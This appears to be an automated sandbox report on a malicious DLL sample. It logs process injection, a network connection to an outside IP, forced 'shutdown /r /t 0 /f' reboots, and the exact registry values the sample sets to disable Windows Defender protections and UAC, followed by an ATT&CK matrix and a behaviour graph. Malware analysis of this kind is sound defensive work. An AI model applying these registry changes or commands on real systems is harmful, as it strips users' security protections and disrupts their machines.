Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetAdaptersInfo,GetAdaptersInfo,6_2_0040A0E3
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 18022805Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 18022808
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 18022808
Source: C:\Windows\SysWOW64\rundll32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_6-11997
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7888Thread sleep time: -18022805s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 2184Thread sleep time: -18022808s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6764Thread sleep time: -18022808s >= -30000s
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 18022805Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 18022808
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 18022808
Source: rundll32.exe, 0000000C.00000002.1326971920.00000000005EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllR
Source: rundll32.exe, 00000023.00000002.1327887510.0000000002C7A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %SystemRoot%\System32\winrnr.dllHyper-V RAW.
Source: rundll32.exe, 00000006.00000002.1326106111.00000000033EA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.1329154909.0000000002A91000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1303026422.000000000326A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000023.00000002.1327887510.0000000002C7A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort

HIPS / PFW / Operating System Protection Evasion

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 188.166.28.204 80
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 8.8.8.8 53
Disables Windows Defender (deletes autostart)
Source: C:\Windows\SysWOW64\rundll32.exeRegistry value deleted: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender ServiceKeepAliveJump to behavior
Injects a PE file into a foreign processes
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\rundll32.exe base: 400000 value starts with: 4D5AJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\rundll32.exe base: 400000 value starts with: 4D5AJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\rundll32.exe base: 400000 value starts with: 4D5AJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\rundll32.exe base: 400000 value starts with: 4D5AJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\rundll32.exe base: 400000 value starts with: 4D5AJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\BJtPlI.dll",#1Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c shutdown /r /t 0 /fJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c shutdown /r /t 0 /f
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c shutdown /r /t 0 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\shutdown.exe shutdown /r /t 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\shutdown.exe shutdown /r /t 0 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\shutdown.exe shutdown /r /t 0 /f
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

barindex
Contains functionality to modify Windows User Account Control (UAC) settings
Source: C:\Windows\SysWOW64\rundll32.exeCode function: RegSetValue: SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\SystemEnableLUA6_2_0041EE09
Disable Windows Defender real time protection (registry)
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows DefenderRegistry value created: DisableRoutinelyTakingAction 1Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows DefenderRegistry value created: DisableSpecialRunningModes 1Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows DefenderRegistry value created: DisableAntiVirus 1Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\SpynetRegistry value created: DisableBlockAtFirstSeen 1Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Windows Defender Antivirus\Cloud Delivered ProtectionRegistry value created: DisableCloudProtection 1Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time ProtectionRegistry value created: DisableRealtimeMonitoring 1Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time ProtectionRegistry value created: DisableIOAVProtection 1Jump to behavior
Disables UAC (registry)
Source: C:\Windows\SysWOW64\rundll32.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUAJump to behavior
Modifies Windows Defender signatures updates days
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Signature UpdatesRegistry value created: ForceUpdateFromMU 0Jump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Native API		1
DLL Side-Loading		1
Access Token Manipulation		5
Disable or Modify Tools		OS Credential Dumping11
Security Software Discovery		Remote ServicesData from Local System1
Ingress Tool Transfer		Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts211
Process Injection		31
Virtualization/Sandbox Evasion		LSASS Memory31
Virtualization/Sandbox Evasion		Remote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
DLL Side-Loading		1
Access Token Manipulation		Security Account Manager1
Process Discovery		SMB/Windows Admin SharesData from Network Shared Drive11
Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
Bypass User Account Control		211
Process Injection		NTDS1
System Network Configuration Discovery		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information		LSA Secrets1
System Information Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Rundll32		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
DLL Side-Loading		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
Bypass User Account Control		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1634520 Sample: BJtPlI.dll Startdate: 11/03/2025 Architecture: WINDOWS Score: 100 73 Antivirus / Scanner detection for submitted sample 2->73 75 Multi AV Scanner detection for submitted file 2->75 77 Sigma detected: Invoke-Obfuscation CLIP+ Launcher 2->77 79 3 other signatures 2->79 10 loaddll32.exe 1 2->10         started        process3 process4 12 rundll32.exe 2 10->12         started        15 cmd.exe 1 10->15         started        17 rundll32.exe 10->17         started        19 conhost.exe 10->19         started        signatures5 93 Contains functionality to modify Windows User Account Control (UAC) settings 12->93 95 Injects a PE file into a foreign processes 12->95 21 rundll32.exe 12 12->21         started        24 rundll32.exe 12->24         started        26 rundll32.exe 12->26         started        28 rundll32.exe 12->28         started        97 Uses shutdown.exe to shutdown or reboot the system 15->97 30 rundll32.exe 15->30         started        32 rundll32.exe 17->32         started        process6 signatures7 81 Disables Windows Defender (deletes autostart) 21->81 83 Disables UAC (registry) 21->83 85 Disable Windows Defender real time protection (registry) 21->85 87 Modifies Windows Defender signatures updates days 21->87 34 cmd.exe 1 21->34         started        36 cmd.exe 24->36         started        38 WerFault.exe 2 26->38         started        40 WerFault.exe 2 28->40         started        89 Injects a PE file into a foreign processes 30->89 42 rundll32.exe 30->42         started        45 rundll32.exe 30->45         started        47 rundll32.exe 30->47         started        49 rundll32.exe 30->49         started        91 System process connects to network (likely due to code injection or exploit) 32->91 process8 dnsIp9 51 conhost.exe 34->51         started        53 shutdown.exe 1 34->53         started        55 conhost.exe 36->55         started        57 shutdown.exe 1 36->57         started        69 188.166.28.204, 49708, 49709, 49711 DIGITALOCEAN-ASNUS Netherlands 42->69 71 8.8.8.8, 49707, 49710, 49712 GOOGLEUS United States 42->71 59 cmd.exe 45->59         started        61 WerFault.exe 2 47->61         started        63 WerFault.exe 2 49->63         started        process10 process11 65 conhost.exe 59->65         started        67 shutdown.exe 1 59->67         started       

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.